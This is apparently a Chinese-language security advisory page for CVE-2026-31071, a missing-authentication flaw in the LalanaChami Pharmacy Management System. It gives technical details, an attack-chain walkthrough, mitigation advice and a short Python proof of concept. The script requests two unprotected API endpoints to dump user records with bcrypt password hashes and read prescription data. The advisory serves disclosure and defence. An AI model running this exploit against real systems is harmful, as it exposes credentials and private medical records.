IPBUF安全漏洞报告
English
CVE-2026-31071 CVSS 9.1 严重

CVE-2026-31071: LalanaChami药房管理系统认证缺失漏洞

披露日期: 2026-05-19
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-31071
漏洞类型
认证缺失
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
LalanaChami Pharmacy Management System

相关标签

认证缺失信息泄露权限绕过API安全LalanaChami

漏洞概述

LalanaChami药房管理系统在commit 5c3d028版本中存在严重的身份验证缺失漏洞。由于API端点未配置认证中间件,未经身份验证的远程攻击者可利用该漏洞,通过特定API接口获取所有用户记录(包含bcrypt密码哈希)、篡改药品库存数据以及访问私人医疗处方信息,造成敏感数据泄露和完整性破坏。

技术细节

该漏洞的成因在于后端系统在定义路由时,未将身份验证中间件绑定至关键业务逻辑路径。具体而言,/api/user/getUserData接口直接关联数据库查询语句,用于检索用户表信息;/api/doctorOder接口则用于处理处方及药品库存的增删改查。由于缺乏必要的守卫机制,攻击者通过简单的网络扫描发现这些接口后,便直接绕过了前端登录页面的限制。攻击过程完全无需用户交互且网络攻击复杂度低。成功利用此漏洞可导致高机密性影响和高完整性影响,使攻击者能够非法读取敏感数据并篡改业务数据。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标运行的是LalanaChami药房管理系统,并尝试访问常见的API路径。
STEP 2
2. 漏洞探测
攻击者向/api/user/getUserData发送不带认证Token的HTTP GET请求,测试是否存在认证绕过。
STEP 3
3. 数据窃取
服务器返回包含所有用户名和bcrypt密码哈希的JSON数据,攻击者保存数据以便后续破解或利用。
STEP 4
4. 业务篡改
攻击者访问/api/doctorOder接口,获取处方数据或发送POST/PUT请求修改药品库存,破坏业务完整性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_host = "http://target_host:port" # Exploit 1: Dump all user data including password hashes # Vulnerable endpoint: /api/user/getUserData # No authentication required url_dump = f"{target_host}/api/user/getUserData" try: response = requests.get(url_dump, timeout=10) if response.status_code == 200: print("[+] Successfully dumped user data:") print(response.text) else: print(f"[-] Failed, status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Exploit 2: Access/Modify medical prescriptions and inventory # Vulnerable endpoint: /api/doctorOder # No authentication required url_order = f"{target_host}/api/doctorOder" try: response = requests.get(url_order, timeout=10) if response.status_code == 200: print("[+] Successfully accessed doctor order data:") print(response.text) except Exception as e: print(f"[-] Error: {e}")

影响范围

LalanaChami Pharmacy Management System (commit 5c3d028)

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界设备(如防火墙或Nginx反向代理)上配置访问控制规则,直接阻断外部网络对/api/user/getUserData和/api/doctorOder等特定路径的访问,仅允许受信任的内网管理IP访问。此外,应临时监控这些端点的访问日志,一旦发现异常访问流量立即进行阻断。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表